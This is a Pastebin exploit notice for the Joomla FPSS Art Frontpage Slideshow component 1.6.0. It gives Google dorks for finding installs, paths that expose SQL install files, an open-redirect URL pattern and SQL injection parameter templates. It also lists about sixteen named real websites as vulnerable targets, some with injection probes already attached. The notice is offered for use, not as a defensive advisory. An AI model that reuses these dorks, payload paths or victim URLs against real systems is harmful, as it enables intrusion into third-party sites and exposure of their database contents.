API tools faq
paste
Advertisement
KingSkrupellos

Joomla FPSS Art Frontpage Slideshow 1.6.0 Multiple Vuln

KingSkrupellos
Jan 18th, 2019
266
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.70 KB | None | 0 0
raw download clone embed print report
  1. ####################################################################################################
  2.  
  3. # Exploit Title : Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 19/01/2019
  7. # Vendor Homepage : artetics.com
  8. # Software Information Link : joomlaworks.net/extensions/commercial/frontpage-slideshow
  9. # Software Download Link : extensions.joomla.org/extension/art-frontpage-slideshow/
  10. # Affected Versions : 1.5.3 and 1.6.0
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:/index.php?option=com_fpss
  15. inurl:''/administrator/components/com_fpss/''
  16. # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
  17. CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
  18. CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
  19. CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
  20.  
  21. ####################################################################################################
  22.  
  23. Joomla FPSS Art Frontpage Slideshow Components 1.6.0 Database Disclosure / Open Redirection / SQL Injection
  24.  
  25. ####################################################################################################
  26.  
  27. # Description :
  28. *************
  29.  
  30. Art Frontpage Slideshow is a slideshow module that adds front end animation
  31. that attracts visitors and allows to show images of featured products
  32. and news in a nice eye-catching way.
  33.  
  34. ####################################################################################################
  35.  
  36. # Database Disclosure Exploit :
  37. ***************************
  38.  
  39. /administrator/components/com_fpss/fpss.sql
  40. /administrator/components/com_fpss/install.mysql.sql
  41. /administrator/components/com_fpss/install.mysql.sql
  42.  
  43. # Open Redirection Exploit :
  44. *************************
  45.  
  46. /index.php?option=com_fpss&task=track&id=[ID-NUMBER]&url=[SITE-ADDRESS]
  47.  
  48. # SQL Injection Exploit :
  49. ***********************
  50. /index.php?option=com_fpss&task=module&id=[ID-NUMBER]&format=feed&type=[SQL Injection]
  51.  
  52. /index.php?option=com_fpss&task=module&id=[ID-NUMBER]
  53. &format=feed&type=atom&lang=[SQL Injection]
  54.  
  55. /index.php?option=com_fpss&view=article&id=[ID-NUMBER]
  56. :article-[ARTICLE-NUMBER]&catid=[ID-NUMBER]:articles&Itemid=[SQL Injection]
  57.  
  58. ####################################################################################################
  59.  
  60. # Example Vulnerable Sites :
  61. *************************
  62.  
  63. [+] kancelarija.org.mk/index.php?option=com_fpss&task=module&id=87&format=feed&type=atom&lang=1%27
  64.  
  65. [+] spalya.com.mx/index.php?option=com_fpss&view=article&id=282:article-3&catid=41:articles&Itemid=450%27
  66.  
  67. [+] uaddigital.com/main/index.php?option=com_fpss&task=module&id=27&format=feed&type=1%27
  68.  
  69. [+] cvbsaude.org/administrator/components/com_fpss/install.mysql.sql
  70.  
  71. [+] bio.demokritos.gr/new_site/administrator/components/com_fpss/fpss.sql
  72.  
  73. [+] akademisinergi.com/administrator/components/com_fpss/install.mysql.sql
  74.  
  75. [+] studioscosta.gr/tmp/administrator/components/com_fpss/install.mysql.sql
  76.  
  77. [+] fupacnl.com.br/picture_library/administrator/components/com_fpss/install.mysql.sql
  78.  
  79. [+] pathfinderindemnity.com/administrator/components/com_fpss/install.mysql.sql
  80.  
  81. [+] alkartasunalizeoa.eus/administrator/components/com_fpss/install.mysql.sql
  82.  
  83. [+] muslimfamilyservices.org/site/administrator/components/com_fpss/install.mysql.sql
  84.  
  85. [+] shswadsworth.org/administrator/components/com_fpss/install.mysql.sql
  86.  
  87. [+] tjnisseki.com/administrator/components/com_fpss/install.mysql.sql
  88.  
  89. [+] telecomreviewna.com/administrator/components/com_fpss/install.mysql.sql
  90.  
  91. [+] waterpng.com.pg/site/administrator/components/com_fpss/install.mysql.sql
  92.  
  93. [+] marinelog.com/administrator/components/com_fpss/install.mysql.sql
  94.  
  95. ####################################################################################################
  96.  
  97. # Example SQL Database Error :
  98.  
  99. Warning: session_start() [function.session-start]: Cannot send session cookie -
  100. headers already sent by (output started at /home/content/64/4351964/html/configuration.php:1)
  101. in /home/content/64/4351964/html/libraries/joomla/session/session.php on line 423
  102.  
  103. Strict Standards: Non-static method JLoader::import() should
  104. not be called statically in /home/uadvirtual/public_html/main
  105. /libraries/joomla/import.php on line 29
  106.  
  107. ####################################################################################################
  108.  
  109. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  110.  
  111. ####################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!